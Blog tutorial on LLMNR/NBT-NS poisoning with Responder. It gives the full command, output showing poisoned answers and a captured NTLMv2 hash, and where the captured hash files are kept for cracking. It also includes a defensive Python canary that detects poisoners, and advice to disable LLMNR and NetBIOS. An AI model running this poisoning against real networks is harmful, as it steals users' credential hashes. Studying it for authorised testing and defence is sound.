NetBIOS / NBNS spoofing v2

A while ago I wrote an article on NetBIOS spoofing. That was years ago and methods change; the approach there is still relevant and still works, but things have become much easier.

You can find the older article here: http://inner-tech.blogspot.co.uk/2015/09/netbios-nbns-spoofing.html

So whilst using the Metasploit modules for obtaining NetBIOS requests over the network, I found this took longer than it needed to, and I frequently had to look up the commands to remember them.

So I figured, why not take it back a step and find out exactly what Metasploit is doing, and either find a base script or create something myself.

It turns out that Metasploit actually uses a tool called Responder, or likely an edited version of it.

Responder can be found by default in Kali Linux (or BackTrack if you're still behind the times).

The tool is very easy to use:

  $ responder -i 10.235.53.132 -f -w -F -v

Let's break this down a little before we look at the intended output.

  • -i 10.20.30.40  The IP address to redirect the traffic to (usually yours).
  • -f  This option lets you fingerprint a host that issued an NBT-NS or LLMNR query.
  • -w  Set this to start the WPAD rogue proxy server.
  • -F  Set this if you want to force NTLM/Basic authentication on wpad.dat file retrieval. This might cause a login prompt in some specific cases, so only use this if you HAVE to.
  • -v  And of course, verbose mode.

$ responder -i 10.235.53.132 -f -w -F -v
NBT Name Service/LLMNR Responder 2.0.
Please send bugs/comments to: lgaffie@trustwave.com
To kill this script hit CRTL-C

[+]NBT-NS, LLMNR & MDNS responder started
[+]Loading Responder.conf File..
Global Parameters set:
Responder is bound to this interface: ALL
Challenge set: 1122334455667788
WPAD Proxy Server: True
WPAD script loaded:  function FindProxyForURL(url, host){if ((host == "localhost") || shExpMatch(host, "localhost.*") ||(host == "127.0.0.1") || isPlainHostName(host)) return "DIRECT"; if (dnsDomainIs(host, "RespProxySrv")||shExpMatch(host, "(*.RespProxySrv|RespProxySrv)")) return "DIRECT"; return 'PROXY ISAProxySrv:3141; DIRECT';}
HTTP Server: ON
HTTPS Server: ON
SMB Server: ON
SMB LM support: False
Kerberos Server: ON
SQL Server: ON
FTP Server: ON
IMAP Server: ON
POP3 Server: ON
SMTP Server: ON
DNS Server: ON
LDAP Server: ON
FingerPrint hosts: True
Serving Executable via HTTP&WPAD: OFF
Always Serving a Specific File via HTTP&WPAD: OFF


NBT-NS Answer sent to: 10.240.53.162. The requested name was : ISDSN408-SERV06
LLMNR poisoned answer sent to this IP: 10.240.53.162. The requested name was : ISDSN409-EPO01.
LLMNR poisoned answer sent to this IP: 10.240.53.134. The requested name was : wpad.
[+] OsVersion is:Windows 7 Enterprise 7601 Service Pack 1
[+] ClientVersion is :Windows 7 Enterprise 6.1
LLMNR poisoned answer sent to this IP: 10.240.53.134. The requested name was : wpad.
[+] OsVersion is:Windows 7 Enterprise 7601 Service Pack 1
[+] ClientVersion is :Windows 7 Enterprise 6.1
LLMNR poisoned answer sent to this IP: 10.240.53.134. The requested name was : wpad.
[+] OsVersion is:Windows 7 Enterprise 7601 Service Pack 1
[+] ClientVersion is :Windows 7 Enterprise 6.1
LLMNR poisoned answer sent to this IP: 10.240.53.134. The requested name was : wpad.
[+] OsVersion is:Windows 7 Enterprise 7601 Service Pack 1
[+] ClientVersion is :Windows 7 Enterprise 6.1
LLMNR poisoned answer sent to this IP: 10.240.53.134. The requested name was : wpad.
[+] OsVersion is:Windows 7 Enterprise 7601 Service Pack 1
[+] ClientVersion is :Windows 7 Enterprise 6.1
[+]HTTP GET request from : 10.240.53.134. The HTTP URL requested was: /wpad.dat
[+]HTTP NTLMv2 hash captured from : 10.240.53.134
Complete hash is : [NTLMv2 hash omitted]
[+]WPAD (auth) file sent to: 10.240.53.134
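
The output above shows Responder answering every NBT-NS and LLMNR query it sees, whatever the name asked for. That behaviour is also what makes it easy to spot from the defender's side: a healthy segment never answers a query for a random name that does not exist, so any reply to such a name is a poisoner. The Python canary below is an added example written for this post; it is not part of the original article and not Responder's code. It builds a raw LLMNR query (multicast 224.0.0.252:5355) and a raw NBT-NS name query (broadcast to UDP 137) for a random bogus name, then reports whoever answers and which address they handed back. It assumes a Linux host attached to the segment being checked and uses only the Python standard library.

```python
# LLMNR / NBT-NS poisoner canary (added example, not part of the original post).
# Responder answers every name query it sees; a legitimate LAN answers none of
# the bogus names sent here, so any reply is treated as a poisoning signal.
import random
import socket
import string
import struct

LLMNR_GROUP, LLMNR_PORT = "224.0.0.252", 5355   # RFC 4795 link-local multicast group
NBNS_PORT = 137                                 # NetBIOS Name Service

def random_name(length=12):
    """A lowercase label that no real host on the segment should own."""
    return "".join(random.choices(string.ascii_lowercase, k=length))

def build_llmnr_query(name, txid):
    """LLMNR query: DNS-shaped header, one A/IN question, no flags set."""
    header = struct.pack("!HHHHHH", txid, 0, 1, 0, 0, 0)
    qname = b"".join(bytes([len(l)]) + l.encode("ascii") for l in name.split(".")) + b"\x00"
    return header + qname + struct.pack("!HH", 1, 1)   # QTYPE=A, QCLASS=IN

def encode_netbios_name(name, suffix=0x00):
    """RFC 1001 first-level encoding: 15-char space-padded name plus suffix byte,
    every byte split into two nibbles and written as the letters 'A'..'P'."""
    raw = name.upper().ljust(15)[:15].encode("ascii") + bytes([suffix])
    encoded = bytearray()
    for b in raw:
        encoded += bytes([0x41 + (b >> 4), 0x41 + (b & 0x0F)])
    return b"\x20" + bytes(encoded) + b"\x00"          # length 32, body, terminator

def build_nbns_query(name, txid):
    """NBT-NS NAME QUERY REQUEST: flags 0x0110 = query, recursion desired, broadcast."""
    header = struct.pack("!HHHHHH", txid, 0x0110, 1, 0, 0, 0)
    return header + encode_netbios_name(name) + struct.pack("!HH", 0x0020, 0x0001)  # NB/IN

def _skip_name(buf, off):
    """Advance past a (possibly compressed) DNS-style name."""
    while True:
        length = buf[off]
        if length == 0:
            return off + 1
        if length & 0xC0 == 0xC0:           # compression pointer is two bytes long
            return off + 2
        off += 1 + length

def parse_answer_ips(resp, txid):
    """IPs carried in the answer section of an LLMNR (A) or NBT-NS (NB) response.
    Returns [] when the transaction id does not match or the packet is not a response."""
    if len(resp) < 12:
        return []
    rid, flags, qd, an, _ns, _ar = struct.unpack("!HHHHHH", resp[:12])
    if rid != txid or not flags & 0x8000:
        return []
    off = 12
    for _ in range(qd):                     # skip the echoed question(s)
        off = _skip_name(resp, off) + 4
    ips = []
    for _ in range(an):
        off = _skip_name(resp, off)
        rtype, _rclass, _ttl, rdlen = struct.unpack("!HHIH", resp[off:off + 10])
        off += 10
        rdata = resp[off:off + rdlen]
        off += rdlen
        if rtype == 1 and rdlen == 4:                        # A record
            ips.append(socket.inet_ntoa(rdata))
        elif rtype == 0x0020:                                # NB record: NB_FLAGS(2) + ADDR(4) entries
            for i in range(0, rdlen // 6 * 6, 6):
                ips.append(socket.inet_ntoa(rdata[i + 2:i + 6]))
    return ips

def probe(build, dst, port, timeout=2.0, broadcast=False):
    """Send one query for a random name and collect every answer until timeout.
    Returns (name, [(answering_src_ip, [ips_in_answer]), ...])."""
    txid, name = random.randrange(1, 0xFFFF), random_name()
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(timeout)
    if broadcast:
        sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
    hits = []
    try:
        sock.sendto(build(name, txid), (dst, port))
        while True:
            data, (src, _) = sock.recvfrom(4096)
            hits.append((src, parse_answer_ips(data, txid)))
    except socket.timeout:
        pass
    finally:
        sock.close()
    return name, hits

if __name__ == "__main__":
    # Assumption: run on a Linux host attached to the segment being checked.
    for label, build, dst, port, bc in (("LLMNR", build_llmnr_query, LLMNR_GROUP, LLMNR_PORT, False),
                                        ("NBT-NS", build_nbns_query, "255.255.255.255", NBNS_PORT, True)):
        name, hits = probe(build, dst, port, broadcast=bc)
        if not hits:
            print(f"[ok] {label}: nobody answered bogus name {name!r}")
        for src, ips in hits:
            print(f"[ALERT] {label}: {src} answered bogus name {name!r} with {ips} - likely poisoner")
```

Run it periodically from a monitoring host and treat any [ALERT] line as an incident to investigate; the answering source address is the host to look at. On the prevention side, disabling LLMNR and NetBIOS over TCP/IP on Windows clients (via Group Policy and the adapter's WINS settings) means there are no queries left for a tool like this to answer.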

Once you have obtained a whole bunch of these hashes, they can be found in:

$ cd /usr/share/responder/
$ ls
HTTP-NTLMv2-Client-10.240.53.134.txt
SMB-NTLMv2-Client-10.150.100.120.txt

Now it is just a matter of cracking these hashes, which can be done using your preferred cracking method. I will be creating and linking to those methods in future posts.


